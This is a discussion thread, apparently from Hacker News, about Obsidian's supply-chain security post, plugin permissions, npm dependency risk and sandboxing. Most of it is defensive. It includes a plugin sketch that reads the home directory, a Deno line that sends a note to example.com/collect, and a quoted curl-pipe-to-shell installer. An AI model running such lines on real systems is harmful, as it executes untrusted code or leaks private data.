A number of operating system security features, such as ASLR, exist because low-level languages allow reading and writing memory they didn't allocate.
Conversely, barring a bug in the runtime or compiler, higher-level languages don't enable those kinds of shenanigans.
See for example the Heartbleed bug, where OpenSSL would read memory it didn't own when given a suitably malformed heartbeat request.
Not a huge electron fan (thank god for tauri), but Obsidian is a fantastic app and you shouldn't let the electron put you off of it. You can even hook an MCP server up to it and an agent can use it as a personal knowledge base, it's quite handy.
These practices are very similar to what I've done in the past, for a large, sensitive system, and they worked very well.
(IIUC, we actually were the first to get a certain certification for cloud deployment, maybe because we had a good handle on this and other factors.)
From the language-specific network package manager, I pulled the small number of third-party packages we used into the filesystem tree of the system's repo, and audited each new version. And I disabled the network package manager in the development and deployment environments, to make it much harder for people to add dependencies accidentally.
Dependencies outside this either came from the Linux distro (nice, because of well-managed security updates), or went into the `vendor` or `ots` (off-the-shelf) trees of the repo (and are monitored for security updates).
Though, I look at some of the Python, JS, or Rust dependency explosions I sometimes see -- all dependent on being hooked up to the language's network package manager, with many people adding these cavalierly -- and it becomes a much harder problem.
If the obsidian team did a 2 hour q&a livestream every week, I'd watch every one (or at least get the AI summary). One of my favorite pieces of software ever.
Going to preface this post by saying I use and love Obsidian, my entire life is effectively in an Obsidian vault, I pay for sync and as a user I'm extremely happy with it.
But as a developer this post is nonsense and extremely predictable [1]. We can expect countless others like it that explain how their use of these broken tools is different and just don't worry about it!
By their own linked Credits page there are 20 dependencies. Let's take one of those, electron, which itself has 3 dependencies according to npm. Picking one of those, electron/get has 7 dependencies. One of those dependencies, got, has 11 dependencies; one of those, cacheable-request, has 7 dependencies, etc. etc.
Now go back and pick another direct dependency of Obsidian and work your way down the dependency tree again. Does the Obsidian team review all of these, and who owns them? Do they trust each layer of the chain to pick up issues before it gets to them? Any one of these dependencies can be compromised. This is what it means to be a supply chain attack: you only have to quietly slip something into any one of these dependencies to gain access to countless users' critical data.
To be fair, the electron project likely invests some resources in reviewing its own dependencies, because of its scale. But yeah this is a good exercise, I think we need more systems like Yocto which prioritize complete understanding of the entire product from source.
Coincidentally I did that yesterday. Mermaid pulls in 137 dependencies. I love Obsidian and the Obsidian folks seem like good people but I did end up sandboxing it.
This is obviously the way to do it, assuming you have the skills and resources to operate in this manner. If you don't, then godspeed, but you have to know going in that you are trading expediency now for risk later. Risk of performance issues, security vulnerabilities, changes in behavior, etc. And when the mess inevitably comes, at whatever inopportune time, you don't really get to blame other people...
I installed an AppArmor profile for Obsidian. For an application that displays text files, it needed a lot of permissions. It would refuse to run without network access.
You can install Obsidian flatpak and lock it down with flatseal.
Was hoping they outlined their approach to handling potentially compromised packages running on dev machines prior to even shipping. That seems like a much harder problem to solve.
Can’t wait for “implements mechanism to delay application of new patches” to start showing up in compliance checklists. My procrastination will finally pay off!
I love Obsidian dearly, but if you build an app that's only really useful with plugins, and that has a horrifyingly bad security model for plugins and little to no assurance of integrity of the plugins...
Maybe, just maybe, don't give full-throated advice on reducing risk in the supply chain.
> It may sound obvious but the primary way we reduce the risk of supply chain attacks is to avoid depending on third-party code.
What a horribly disingenuous statement, for a product that isn't remotely usable without 3rd-party plugins. The "Obsidian" product would be more aptly named "Mass Data Exfiltration Facilitator Pro".
I have to agree that I don't find plugins necessary, and I'm not sure why you're so down on people using a solid backlinking note taker. I don't think I have low standards, I think Roam and Logseq aren't that great and Obsidian is all I need.
Absolutely love Obsidian but had to stop using it because Electron apps don't play well with Wayland. After lots of tinkering around with flags and settings for compatibility layers, it became obvious that it would never work seamlessly like it did on Windows (and probably does on X11). So it was either give up Wayland compositors or give up Obsidian. Luckily I don't use any plugins, so moving to other software was easy, but I still would prefer Obsidian. Electron's "works everywhere" works about as well as Java's "works everywhere", which is to say it works great, until it doesn't, at which point it's a mess of tinkering.
If you use Wayland and it works for you, that's great, but it's not my experience.
In my experience electron + Wayland was absolutely god awful for a long time, but it got dramatically better in the last 4-5ish months. So depending on when you last tried it, it might be worth a revisit. Heavily depends on which GPU+DE though, Nvidia+Plasma here.
But still along the same lines as "safer". The stresses are different: "safer" has the stress as "SAY-fer" and "secure" has the stress as "sih-KYOOR". The latter sounds more similar to (and rhymes better with) "more", the originator of the phrase "less is more".
This doesn't make any sense to me. I've always been told you don't write anything yourself unless you absolutely have to and having a million micro-dependencies is a good thing. JavaScript and now Rust devs have been saying this for years. Surely they know what they're doing...
There is a balance to be struck. NPM in particular has been a veritable dependency hell for a long time. I don't know if it just attracts inexperienced developers, or if its security model is fundamentally flawed, but there have been soooo many supply chain attacks using NPM that being extra careful is very much warranted.
This is one way to look at it, but it ignores the fact that most users use third-party community plugins.
Obsidian has a truly terrible security model for plugins. As I realized while building my own, Obsidian plugins have full, unrestricted access to all files in the vault.
Obsidian could've opted to be more 'batteries-included', at the cost of more development effort, but it instead leaves this to the community, which in turn increases the attack surface significantly.
Or it could have a browser-extension-like manifest that declares all permissions used by the plugin, where any attempt to use a permission that hasn't been granted gets blocked.
Both of these approaches would've led to more real security for end users than "we have few third party dependencies".
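For illustration, here's a rough sketch of what a declared-permissions model could look like. Everything in it is hypothetical (no such manifest or gate exists in Obsidian today); it's only meant to show how little machinery a coarse permission check actually needs:

    // Hypothetical fields a plugin would declare up front in its manifest
    interface PluginManifest {
      id: string;
      permissions: Array<"vault:read" | "vault:write" | "network" | "clipboard">;
    }

    // Host-side gate: every privileged API call checks the manifest before acting
    class PermissionGate {
      constructor(private manifest: PluginManifest) {}

      require(perm: PluginManifest["permissions"][number]): void {
        if (!this.manifest.permissions.includes(perm)) {
          throw new Error(`${this.manifest.id} was not granted "${perm}"`);
        }
      }
    }

    // The vault API handed to a plugin is pre-wrapped with that plugin's gate
    function makeVaultApi(gate: PermissionGate, raw: { read(path: string): Promise<string> }) {
      return {
        read(path: string) {
          gate.require("vault:read");
          return raw.read(path);
        },
      };
    }

It wouldn't stop a determined malicious plugin on its own (that needs real process isolation), but it would at least make the requested access visible at install time.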
When I was young there were a few luminaries in the software world who talked about how there is a steady if small flow of ideas from video game design into conventional software.
But I haven't heard anyone talk like that in quite some time (unless it's me parroting them). Which is quite unfortunate.
I think for example if someone from the old guard of Blizzard were to write a book or at least a novella that described how the plugin system for World of Warcraft functioned, particularly during the first ten years, where it broke, how they hardened it over time, and how the process worked of backporting features from plugins into the core library...
I think that would be a substantial net benefit to the greater software community.
Far too many ecosystems make ham-fisted, half-assed, hare-brained plugin systems. And the vast majority can be consistently described by at least two of the three.
I came to learn that even though in-process plugins are easier to implement and less resource-demanding, anyone serious about host stability and security can only allow plugins that run out of process, over OS IPC.
And in general, that will still take fewer hardware resources than the usual Electron stuff.
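For the sake of illustration, a minimal sketch of the host side of that arrangement in Node (the plugin file name and message format are made up; a real system needs a protocol, timeouts, and resource limits):

    import { spawn } from "node:child_process";

    // The plugin runs as a separate OS process: if it crashes or hangs,
    // the host survives, and the OS enforces the boundary between them.
    const plugin = spawn(process.execPath, ["plugin-entry.js"], {
      stdio: ["pipe", "pipe", "inherit"], // talk over stdin/stdout only
    });

    // The host decides exactly which data crosses the boundary.
    plugin.stdin?.write(JSON.stringify({ type: "render", noteText: "# Hello" }) + "\n");

    plugin.stdout?.on("data", (chunk) => {
      // Everything coming back is untrusted input and should be validated.
      console.log("plugin replied:", chunk.toString());
    });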
I’ve been of the opinion that every hard problem in CS shows up somewhere in gamedev. It’s a great space for inspo.
Kernel design is (to me) another one where ideas have flowed into other software fields - there were monolithic kernels, microkernels, and hybrid kernels, and they all need to work with third-party modules (drivers).
The lessons from all fields seem to be relearnt again and again in new fields :-)
Because learning how to make a proper one requires building your own broken one first.
It might be slightly sped up by reading up on theory and past experiences of others.
I am around midlife and I see how I can tell people stuff, and I can point people to resources, but they still won’t learn until they hit the problem themselves and put their minds into figuring it out.
> Obsidian plugins have full, unrestricted access to all files in the vault.
Unless something has changed, it's worse than that. Plugins have unrestricted access to any file on your machine.
When I brought this up in Discord a while back they brushed it aside.
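To make it concrete: on the desktop app, a plugin's onload can do something like the following today (a sketch, assuming the usual Electron setup where Node's modules are reachable from plugin code), and nothing in the plugin API scopes it to the vault:

    import { Plugin } from "obsidian";
    import * as fs from "node:fs";
    import * as os from "node:os";

    export default class NosyPlugin extends Plugin {
      async onload() {
        // Not limited to the vault folder: any path the OS user can read is reachable.
        const entries = fs.readdirSync(os.homedir());
        console.log("entries outside the vault:", entries.length);
      }
    }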
What if you run little snitch and block any communications from obsidian to anything?
Or firejail. Or QubesOS using a dedicated VM. There are options, but it would still be nice if Obsidian had a more robust security model.
I have been using firejail for most of these kinds of applications, be it Obsidian, Discord, or the browser I am using. I definitely recommend people start using it.
Sell it to us! Why do you use specifically firejail?
There are so many options, from so many different security perspectives, that analysis paralysis is a real issue.
Little snitch can block open(2)?
I believe they're saying it can open, it just can't send the data anywhere.
Seems a little excessive, but here we are.
If you're using a flatpak, that's not actually the case. It would have very restricted access, to the point where you would even have to explicitly give it access to the user's /home.
So if I run their software in a container they can't access my entire filesystem. I don't think that is a security feature.
It sounds like if I ever run obsidian I should be using Flatseal too.
Er, what?
I'm not claiming it's a security feature of Obsidian, I'm saying it's a consequence of running a flatpak - and in this situation it could be advantageous for those interested.
Having recently read through a handful of issues on their forums, they seem to brush aside a lot of things. It's a useful tool, but the mod / dev team they have working with the community could use some training.
To be fair, it’s no worse of a dumpsterfire than any other plug-in ecosystem.
I think it's a matter of time until we see a notable plugin in the Obsidian space get caught exfiltrating data. I imagine then, after significant reputational harm, the team will start introducing safeguards. At a minimum, create some sort of verified publisher system.
Funny enough, I thought this earlier about Arch Linux and its derivatives. It was mentioned on Reddit that they operate on a small budget. A maintainer replied that they have very low overhead, and the first thought that popped into my mind was that most of the software I use and rely on comes from the AUR, which relies on the user to manage their own security.
If engineers can't even manage their own security, why are we expecting users to do so?
I think this criticism is unfair because most common packages are covered by the core and extra repos, which are maintained by Arch Linux. The AUR is a collection of user-submitted build scripts, and using it has a certain skill cliff, such that I expect most users to have explicit knowledge of the security dangers. I understand your concern, but it would be weird and out of scope for Arch to maintain or moderate the AUR when what Arch is providing here amounts to little more than hosting. Instead, Arch rightly gives users the tools to moderate it themselves through the votes and comments features. Also, the most popular AUR packages are maintained by well-known maintainers.
The derivatives are obviously completely separate from Arch and thus are not the responsibility of Arch maintainers.
Disagree. The AUR isn’t any trickier than using pacman most of the time. Install an AUR helper like yay or paru and you basically use it the same way as the default package manager.
It’s still the same problem, relying on the community and trusted popular plugin developers to maintain their own security effectively.
I understood GP's point to be that because Obsidian leaves a lot of functionality to plugins, most people are going to use unverified third-party plugins. On Arch, however, most packages are in core or extra, so most people won't need to go to the AUR. They are more likely to install the flatpak or get the AppImage for apps not in the repos, as that's much easier.
yay or paru (or other AUR helpers, AFAIK) are not in the repos. To install them one needs to know how to use the AUR in the first place. If you are technical enough to do that, you should know about the security risks, since almost all tutorials for the AUR come with security warnings. It's also inconvenient enough that most people won't bother.
In Obsidian, plugins can seem central to the experience, so users might not think much of installing them; in Arch, the AUR is very much a non-essential component. At least that's how I understand it.
> If engineers can't even manage their own security, why are we expecting users to do so?
This latest attack hit CrowdStrike as well. Imagine they had gotten inside Huntress, who opened up about how much they can abuse the access given: https://news.ycombinator.com/item?id=45183589
Security folks and companies think they are important. The C-suite sees them as a scapegoat WHEN the shit hits the fan, and most end users feel the same about security as they do about taking off their shoes at the airport (what is this nonsense for), and they mostly aren't wrong.
It's not that engineers can't take care of their own security. It's that we have made it a fight with an octopus rather than something that is seamless and second nature. Furthermore, security and privacy go hand in hand... Teaching users that is not to the benefit of a large portion of our industry.
> It's not that engineers cant take care of their own security.
I dunno. My computer has at least 1 hardware backdoor that I know of, and I just can't get hardware without an equivalent exploit.
My OS is developed with a set of tools that is known to make code review about as hard as possible. It provides the bare minimum of application insulation, and it is 2 orders of magnitude larger than any single person can read in their lifetime. It's also the usable OS out there with the best security guarantees; everything else is much worse or useless.
A browser is almost a complete new layer above the OS. And it's 10 times larger. Also written in a way that famously makes review impossible.
And then there are the applications, which is what everybody is focusing on today. Keeping them secure is close to useless if one doesn't fix all of the above.
You never actually told us what your OS is.
Because that would be a distraction to the point they're actually making.
They must mean macos, right?
I'm developing an Obsidian plugin commercially. I wish there was a higher tier of vetting available to a certain grade of plugin.
IMO they should do something like the AUR on Arch Linux: have a community-managed plugin repo and then a smaller, more vetted one. That would help with the plugin review time too.
Just out of curiosity, what's the plugin? Are there folks interested in paying for plugins?
The plugin is called Relay [0] -- it makes Obsidian more useful in a work setting by adding real-time collaboration.
One thing that makes our offering unique is the ability to self-host your Relay Server so that your docs are completely private (we can't read them). At the same time you can use our global identity system / control plane to collaborate with anyone in the world.
We have pretty solid growth, a healthy paid consumer base (a lot of students and D&D/TTRPG), and we're starting to get more traction with businesses and enterprise.
[0] https://relay.md
Are you worried about being sherlocked at all? I know "multiplayer" is on their official roadmap.
yeah, definitely.
It might not be the most strategic move, but I want to build cool and useful tools, and the Obsidian folks are a big inspiration.
I hope there's a way to collaborate and/or coexist.
This open letter seems relevant here: https://www.emilebangma.com/Writings/Blog/An-open-letter-to-...
It's no worse than vscode. Sure there are permissions, but it's super common for an extension to start a process, and that process can do anything it wants.
It's *significantly* worse than vscode. vscode is at least attempting to grapple with the problem: https://code.visualstudio.com/docs/configure/extensions/exte....
And why is VSCode our baseline?
Plus vscode is maintained by a company with thousands of devs. Obsidian is fewer than 10 people, which is amazing. As for plugins, why blame the product? Please check what you install on your machine instead.
Don’t most plugin models work this way? Do VSCode, Vim, Emacs, and friends do anything to segregate content? Gaming is the only area where I expect plugins to have limited permissions.
Browser extensions also have a relatively robust permissions-based system.
If they wanted to, one would guess that browser-ish local apps based on stuff like Electron/node-webkit could probably figure out some way to limit extension permissions more granularly.
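As a sketch of what that could look like (Electron's documented webPreferences options are real; the bridge file and host-side check are hypothetical), the host could load extension code into a sandboxed, Node-free renderer and expose only a narrow, permission-checked IPC surface:

    import { BrowserWindow, ipcMain } from "electron";
    import * as path from "node:path";

    declare function readNoteIfAllowed(notePath: string): Promise<string>; // hypothetical host-side check

    const extensionHost = new BrowserWindow({
      show: false,
      webPreferences: {
        sandbox: true,            // OS-level renderer sandbox
        contextIsolation: true,   // extension JS can't reach into the preload's internals
        nodeIntegration: false,   // no require("fs") from extension code
        preload: path.join(__dirname, "extension-bridge.js"), // hypothetical bridge script
      },
    });

    // The only capabilities the extension gets are the ones the bridge forwards over IPC.
    ipcMain.handle("ext:read-note", (_event, notePath: string) => readNoteIfAllowed(notePath));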
I would have thought so, but it has been how many years, and as far as I know, there is still no segregation for VSCode extensions. Microsoft has all the money, and if they cannot be bothered, I'm not encouraged that smaller applications will be able to iron out the details.
I think it's just because supply-chain attacks are not common enough / their attack surfaces not large enough to be worth the dev time... yet...
Sneak in a malicious browser extension that breaks the permissions sandbox, and you have hundreds of thousands to millions of users as an attack surface.
Make a malicious VSCode/IDE extension and maybe you hit some hundreds or thousands of devs, a couple of smaller companies, and probably can get on some infosec blogs...
The time has come. The nx supply chain attack a couple of weeks ago literally exfiltrated admin tokens from your local dev machine because the VS Code extension for nx always downloaded the latest version of nx from npm. And since nx is a monorepo tool, it’s more applicable to larger projects with more valuable tokens to steal.
The solution at my job is you can only install extensions vetted by IT and updates are significantly delayed. Works well enough but sucks if you want one that isn't available inside the firewall.
> Gaming is the only area where I expect plugins have limited permissions.
It's pretty much the opposite. A lot of modding communities' security model is literally just to "trust the community."
Example: https://skylines.paradoxwikis.com/Modding_API
> The code in Mods for Cities: Skylines is not executed in a sandbox.
> While we trust the gaming community to know how to behave and not upload malicious mods that will intentionally cause damage to users, what is uploaded on the Workshop cannot be controlled.
> Like with any files acquired from the internet, caution is recommended when something looks very suspicious.
vim and emacs are over 30 years old and therefore living with an architecture created when most code was trusted. Encrypting network protocols was extremely rare, much less disks or secrets. I don't think anything about the security posture of vim and emacs should be emulated by modern software.
I would say VSCode has no excuse. It's based on a browser which does have capabilities to limit extensions. Huge miss on their part, and one that I wish drew more ire.
I'd love to see software adopt strong capabilities-based models that enforce boundaries even within parts of a program. That is, with the principle of least authority (POLA), code that you call is passed only the capabilities you wish (e.g. opening a file, or a network socket), and not everything that the current process has access to. Thomas Leonard's post (https://roscidus.com/blog/blog/2023/04/26/lambda-capabilitie...) covers this in great detail, and OCaml's newer Eio effect system has aspects of this too.
The Emily language (locked-down subset of OCaml) was also interesting for actively removing parts of the standard library to get rid of the escape hatches that would enable bypassing the controls.
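In TypeScript terms the shape is roughly this: the function signature is the permission grant, so the callee literally cannot touch anything the caller didn't hand over. A rough sketch (the capability type is made up for illustration):

    import * as fsp from "node:fs/promises";
    import * as path from "node:path";

    // A capability is just an object whose methods are already scoped.
    interface DirReader {
      read(relativePath: string): Promise<string>;
    }

    // Only code holding this object can read files, and only under `root`.
    function makeDirReader(root: string): DirReader {
      const base = path.resolve(root);
      return {
        read(relativePath) {
          const full = path.resolve(base, relativePath);
          if (!full.startsWith(base + path.sep)) {
            throw new Error("path escapes the granted directory");
          }
          return fsp.readFile(full, "utf8");
        },
      };
    }

    // The exporter receives a reader for one folder and nothing else:
    // no ambient fs, no network socket, no process.env.
    async function exportNotes(reader: DirReader): Promise<string> {
      return reader.read("notes/today.md");
    }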
> Gaming is the only area where I expect plugins have limited permissions.
Do you mean mods on Steam? If you do, then that's down to the individual game. Sandboxing mods isn't universal.
I was thinking more of Lua/Luau, which make it trivial to restrict permissions. In general, the gaming client has access to a lot more information than it shares, so to prevent cheats from plugins, the developers have to be explicit about security boundaries.
Perhaps, but I think what you might put onto Obsidian (personal thoughts, journal entries etc) can be more sensitive than code.
Another thought: what about severely sandboxing plugins so that while they have access to your notes, they have no network or disk access and in general lack any way to exfiltrate your sensitive info? Might not be practical, but approaches like this appeal to me.
Deno would be a good candidate for this.
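Its flag-based permissions map onto that idea almost directly: grant the plugin read access to the vault and nothing else, and attempts to reach the network or the rest of the disk are refused by the runtime. A sketch (plugin.ts and the vault path are made up):

    // run with: deno run --allow-read=./vault plugin.ts
    // No network or write permission is granted, so exfiltration attempts fail.
    const note = await Deno.readTextFile("./vault/daily.md"); // allowed by --allow-read=./vault

    // This throws a permission error instead of sending the note anywhere.
    await fetch("https://example.com/collect", { method: "POST", body: note });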
That's ok. I haven't come across an Obsidian plug-in that's worth introducing a dependency for.
I use “Templater” and “Dataview” but now I am rethinking my usage; they were required for the daily template I use (found here on HN) but this is probably overkill.
I did too but have switched over to “bases” now that that’s in core. Before that I had an apparmor profile restricting Obsidian from reaching the web.
This app deals with very critical, personal, and intimate data – personal notes and professional/work-related notes – yet it is proudly an Electron app. This alone has seemed like a massive red flag to me.
> Obsidian plugins have full, unrestricted access to all files in the vault.
And how exactly can you solve that?
I don't want to press 'allow access' on every file some plugin accesses.
One of the large dependencies they call out is an excellent example: pdf.js.
There is no reason for pdf.js to ever access anything other than the files you wish to export. The Export to PDF process could spawn a containerized subprocess with zero filesystem or network access and constrained CPU and memory limits. Files could be sent to the export process over stdin, and the resulting PDF could be streamed back over stdout, with stderr used for logging.
There are lots of plugin systems that work this way. I wish it were commodified and universally available. AFAIK there's very little cross-platform tooling to help you solve this problem easily, and that's a pity.
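The host side of that pipeline is not much code. A rough sketch with Node APIs (the "pdf-exporter" binary stands in for the locked-down subprocess; the actual container/sandbox setup is elided):

    import { spawn } from "node:child_process";
    import { readFile, writeFile } from "node:fs/promises";

    async function exportToPdf(notePath: string, pdfPath: string): Promise<void> {
      const input = await readFile(notePath);

      // The exporter gets no filesystem or network access; its only channels
      // are stdin (document in), stdout (PDF out), and stderr (logs).
      const exporter = spawn("pdf-exporter", [], { stdio: ["pipe", "pipe", "inherit"] });
      exporter.stdin?.end(input);

      const chunks: Buffer[] = [];
      for await (const chunk of exporter.stdout!) chunks.push(chunk as Buffer);

      await writeFile(pdfPath, Buffer.concat(chunks));
    }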
Specific permissions declared in a manifest much like browser extensions could be a good first step.
That just sounds like Linux packages; also not a system known for the security of desktop apps and scripts, especially compared to MacOS. Shoot me.
Operating systems are different though, since their whole purpose is to host _other_ applications.
FWIW, MacOS isn't any better or worse for security than any other desktop OS tbh....
I mean, MacOS just had its "UAC" rollout not that long ago... and not sure about you, but I've encountered many times where someone had to hang up a Zoom or browser call because they updated the app or OS, and had to re-grant screenshare permissions or something. So, not that different. (Pre-"UAC" versions of MacOS didn't do any sandboxing when it came to user files / device access)
The Simpsons Springfield Nuclear Plant Security scene in real life.
https://www.youtube.com/watch?v=eU2Or5rCN_Y
Yes, you are responsible for all the code you ship to your users. Not pinning dependencies is asking for trouble. It is literally, "download random code from the Internet and hope for the best."
Pinning dependencies also means you're missing any security fixes that come in after your pinned versions. That's asking for trouble too, so you need a mechanism by which you become aware of these fixes and either backport them or upgrade to versions containing them.
Things like dependabot or renovate solve the problem of letting you know when security updates are available, letting you have your cake and eat it too.
All code is fundamentally not ever secure.
This statement is one of those useless exercises in pedantry like when people say "well technically coffee is a drug too, so..."
Code with publicly-known weaknesses poses exponentially more danger than code with unknown weaknesses.
It's like telling sysadmins to not waste time installing security patches because there are likely still vulnerabilities in the application. Great way to get n-day'd into a ransomware payment.
Have you spent time reviewing the security patches for any nontrivial application recently? 90% of them are worthless, the 10% that are actually useful are pretty easy to spot. It's not as big of a deal as people would like to have you think.
That's why I run Windows 7. It's going to be insecure anyways so what's the big deal?
Pinned dependencies usually have their own dependencies so you are generally always downloading random code and hoping.
I mean, jeeze, how much code comes along for the ride with Electron...
The real answer is to minimize dependencies (and subdependencies) to the greatest extent practical. In some cases you can get by with surprisingly few without too much pain (and in the long run, maybe less pain than if you'd pulled in more).
Yep, and for the rest I've gotten a lot of mileage, when shipping server apps, by deploying on Debian or Ubuntu* and trying to limit my dependencies to those shipped by the distro (not snap). The distro security team worries about keeping my dependencies patched and I'm not forced to take new versions until I have to upgrade to the next OS version, which could be quite a long time.
It's a great way to keep lifecycle costs down and devops QoL up, especially for smaller shops.
*Insert favorite distro here that backports security fixes to stable package versions for a long period of time.
No. "Always downloading random code and hoping" is not the only option. Even w/ the supply-chain shitshow that the public npmjs registry has become, using pnpm and a private registry makes it possible to leverage a frozen lockfile that represents the entire dependency graph and supports vulnerability-free reproducible builds.
EDIT to add: Of course, reaching a state where the whole graph is free of CVEs is a fleeting state of affairs. Staying reasonably up-to-date and using only scanned dependencies is an ongoing process that takes more effort and attention to detail than many projects are willing or able to apply; but it is possible.
> We do not run postinstall scripts. This prevents packages from executing arbitrary code during installation.
I get the intent, but I’m not sure this really buys much. If a package is compromised, the whole thing is already untrustworthy and skipping postinstall doesn’t suddenly make the rest of the code safe. If it isn’t compromised, then you risk breaking legitimate installation steps.
From a security perspective, it feels like an odd tradeoff. I don’t have hard data, but I’d wager we see far more vulnerabilities patched through regular updates than actual supply-chain compromises. Delaying or blocking updates in general tends to increase your exposure rather than reduce it.
There’s some advice that’s been going around lately that I’ve been having trouble understanding: the idea that you should not be updating your dependencies when new patches are released (e.g., X.X.PATCH).
I understand that not updating your dependencies when new patches are released reduces the chance of accidentally installing malware, but aren’t patches regularly released in order to improve security? Wouldn’t it generally be considered unwise to not install new patches?
There's a key missing piece to this puzzle: being informed about _why_ you're updating and what the patches are.
Nobody has time to read source code, but there are many tools and services that will give you brief summaries of release notes. npm audit lists security vulnerabilities in your package versions, for example.
I do adopt the strategy of not updating unless required, as updates are not only an attack vector, but also an extremely common source of bugs that I'd prefer to avoid.
But importantly I stay in the loop about what exploits I'm vulnerable to. Packages are popping up with vulnerabilities constantly, but if it's a ReDoS vulnerability in part of the package I definitely don't use or pass user input to? I'm happy to leave that alone with a notice. If it's something I'm worried another package might use unsafely, with knowledge of the vulnerability I can decide how important it is, and if I need to update immediately, or if I can (preferably) wait some time for the patch to cook in the wild.
That is the important thing to remember about security in this context: it is an active, continuous process. It's something that needs to be tuned to the risk tolerance and risk appetite of your organisation, rather than a blanket "never update" or "always update" - for a well-formed security stance, one needs more information than that.
Exactly. If you can avoid having to do _any_ patches except those that have a security purpose, you've already reduced your risk of supply chain attacks considerably.
This isn't trivial to organise though, since semver by itself doesn't denote whether a patch is security-related or not. Of course, you can always review the release notes, but this is time consuming, and doesn't scale well when a product grows either in size of code base or community support.
This is where SAST tools (e.g., Semgrep or Snyk; there are many more, but those are the two I've used the most, in no particular order) and supply chain scans fall naturally into place, but they're prohibitively expensive.
There is a lot of open source tooling out there that can achieve the same too of course.
I've found that overhead/TOIL climbs considerably with the number of open source tools you commit to for creating a security baseline. Unfortunately, this realistically means that at most companies, where time is scarcer than money, more money shifts into closed source products like those I listed, rather than into those run by open source products/companies.
I believe it's about waiting a bit after a new patch is released before installing it, not avoiding updates entirely. Compromises seem to be getting caught quickly these days, usually within hours. There are multiple companies monitoring npm package releases because they sell security scanning products, and so it's part of their business to be on top of it.
pnpm has a setting where you can tell it that a package needs to be at least X minutes old in order to be installed. I would wait at least 24 hours just to be safe.
https://pnpm.io/settings#minimumreleaseage
To be honest, right now I'm thinking about isolating the build process for the frontend in my local environment. It seems it would not be hard for it to send local environment variables like OPENAI_API_KEY, or my .ssh/*, to some remote machine.
I know it's not very different from Python or projects in any other language. But I don't feel that I can trust the node/JS community at this point.
Running vite inside a docker container would probably get you what you want
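Something along these lines, roughly (untested sketch; adjust the image tag, port, and script names to your project):
    docker run --rm -it \
      -v "$PWD":/app -w /app \
      -p 5173:5173 \
      node:22 \
      sh -c "npm ci && npm run dev -- --host"
Nothing from $HOME or your shell environment is visible inside unless you mount or pass it in explicitly.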
I don't think you even need a container for that type of containment.
You could do it with namespaces.
I think Node / whatever JS runtime / package manager could allow for namespaced containment of packages using simple, modern Linux facilities.
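bubblewrap is one way to sketch that today: hand the build an empty home directory and no network, using nothing but namespaces (rough illustration; the bind-mount paths vary by distro):
    bwrap --ro-bind /usr /usr --symlink usr/bin /bin --symlink usr/lib /lib --symlink usr/lib64 /lib64 \
          --proc /proc --dev /dev --tmpfs /tmp \
          --tmpfs "$HOME" --bind "$PWD" "$PWD" --chdir "$PWD" \
          --unshare-all --die-with-parent \
          npm run build
Note that --unshare-all also cuts network access, so dependency installs have to happen outside the sandbox (or you selectively add --share-net back).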
The realms proposal was a step towards that at one time.
I’ve been using other apps than Obsidian for notes and sharing, so this is nice to read and consider. But isn’t Obsidian an electron app or whatever? Electron has always seemed resource intensive and not native. JavaScript has never struck me as “secure”. Am I just out of touch?
JavaScript is a very secure language. The browser is a massive success at running secure JavaScript on a global scale. Every website you use is running JavaScript and not able to read other site data. Electron is the same, running v8 to sandbox JavaScript. Assuming you aren't executing user input inside that sandbox (something many programming languages allow, including JS), it's very secure.
The problem with supply chain attacks is specifically related to npm, not to JS. npm as an organization needs to take more responsibility for the recent attacks, and essentially force everyone to use stricter security controls when publishing their packages.
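The controls largely exist already; they're just opt-in today (as far as I understand it):
    npm profile enable-2fa auth-and-writes   # require 2FA for logins and publishes on your account
    npm publish --provenance                 # attach a provenance attestation (requires a supported CI environment)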
I need more evidence to believe this.
Doesn’t this mean browser sandboxing is secure, not JS? Or are you referring to some specific aspect of JS I’m not aware of? (I’m not aware of a lot of JS)
It’s maybe a nit-pick, since most JS is run sandboxed, so it’s sort of equivalent. But it was explicitly what GP asked for. Would it be more accurate to say Electron is secure, not JS?
I mean, JavaScript doesn’t even have APIs for reading a file from disk, let alone executing an arbitrary binary. (Anything similar comes from a runtime like NodeJS.) You can’t access memory in different JS processes… so what would make it insecure?
To be fair, a plugin system built on JS with all plugins interacting in the same JS context as the main app has some big risks. Any plugin can change definitions and variables in the global scope, with some restrictions. But any language where you execute untrusted code in the same context/memory/etc. as trusted code has risks. The only solution is sandboxing plugins.
I'm really curious about this comment. What would it mean for a programming language to be secure?
Any two Turing-complete programming languages are equally secure, no?
Surely the security can only ever come from whatever compiles/interprets it? You can run JavaScript on a piece of paper.
Turing completeness is irrelevant, as it only addresses computation. Security has to do with system access, not computational capacity. Brainfuck is Turing complete, but lacks any primitives to do more than read from a single input stream and write to a single output stream. Unless someone hooks those streams up to critical files, you can't use it to attack a system.
Language design actually has a lot of impact on security, because it defines what primitives you have available for interacting with the system. Do you have an arbitrary syscall primitive? Then the language is not going to help you write secure software. Is your only ability to interact with the system via capability objects that must be provided externally to authorize your access? Then you're probably using a language that put a lot of thought into security and will help out quite a lot.
A number of operating system security features, such as ASLR, exist because low level languages allow reading and writing memory that they didn't create.
Conversely, barring a bug in the runtime or compiler, higher level languages don't enable those kinds of shenanigans.
See for example the Heartbleed bug, where OpenSSL would read memory it didn't own when given a suitably malformed request.
JavaScript is probably, depending on how you measure it, one of the most used languages on earth.
It runs on a majority of computers and basically all phones. There will be many security issues that get discovered by virtue of these facts.
What makes you think that "native" apps are any more secure?
No, it's not really an issue. GitHub and VS Code are also Electron apps. So are Slack and Discord. Postman is, as well.
I'd also be forced to ask... what exactly are you doing with a markdown note-taking application such that performance is a legitimate concern?
But, I mean, maybe you're reading this in a Lynx session on your ThinkPad 701C.
> what exactly are you doing with a markdown note-taking application such that performance is a legitimate concern?
Launching it and expecting a fast startup.
It is resource intensive.
It's not a problem on PC, but an Obsidian vault with thousands of notes can have a laggy startup on mobile, even if you disable plugins.
Users sidestep this issue with quick-capture plugins and apps, but I wish there were a native stripped-down version of Obsidian.
Not a huge electron fan (thank god for tauri), but Obsidian is a fantastic app and you shouldn't let the electron put you off of it. You can even hook an MCP server up to it and an agent can use it as a personal knowledge base; it's quite handy.
> Thank god for tauri
I’d love to try it, but speaking of security, this was the first thing I saw:
sh <(curl https://create.tauri.app/sh)
Right. But you know how to fetch and inspect (yeah?), so... I'm with you that piping random crap to sh is bad, and maybe these snippets encourage that behavior.
Tauri is trustable (for some loose definition) and the pipe to shell is just a well known happy-path.
All that to say it's a low value smell test.
Also, I'm in the camp that would rather git clone and then docker up. My understanding is it gives me a little more sandboxing.
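The fetch-and-inspect version of their snippet is only two extra lines anyway (the file name is arbitrary):
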